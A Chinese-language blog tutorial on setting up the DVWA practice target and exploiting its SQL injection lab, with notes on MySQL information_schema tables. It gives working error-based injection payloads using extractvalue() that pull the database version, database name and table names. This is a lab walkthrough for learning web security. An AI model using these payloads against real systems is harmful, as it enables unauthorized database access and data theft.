DVWA靶机搭建
DVWA(Damn Vulnerable Web App)是一个基于PHP/MySql搭建的Web应用程序,旨在为安全专业人员测试自己的专业技能和工具提供合法的 环境,帮助Web开发者更好的理解Web应用安全防范的过程。
搭建方法与第一遍文章搭建bWAPP环境相同!!默认用户名:admin 默认密码:password
基础知识
在MySQL中,自带了 information_schema信息数据库。这个库的作用保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。在INFORMATION_SCHEMA中,有数个只读表。
information_schema数据库表说明:
SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。
TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。
COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。
STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。
USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。
SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。
TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。
COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。
CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。
COLLATIONS表:提供了关于各字符集的对照信息。
COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。
TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。
KEY_COLUMN_USAGE表:描述了具有约束的键列。
ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。
VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。
TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表。
选择漏洞
漏洞检测
使用最经典的'号进行检测,如果返回错误信息则说明存在注入漏洞
如下图所示,输入'号后点击提交后页面返回数据库的报错信息。
构建playload验证是否能成功注入。
http://x.xx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,(select @@version)) -- &Submit=Submit#
注入后成功获取了数据库版本号。
漏洞利用
获取数据库名称过程
http://xx.xxx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,concat(0x7e,(select database()))) -- &Submit=Submit#
获取数据库表表名过程
information_schema:
首选尝试查询当前数据库中有哪些表,看看是否能够返回数据中所有表名
http://x.xxx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables ))) -- &Submit=Submit#
http://x.xxx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables limit 1,1))) -- &Submit=Submit#
从上述过程注入过程中我们可以通过information_schema数据库获取到数据库中所有的表信息,进而获取表中的所有数据,此时攻击者就相当于掌握的数据中所有的信息。
欢迎大家关注我的订阅号,会定期分享一些关于测试相关的文章,有问题也欢迎一起讨论学习!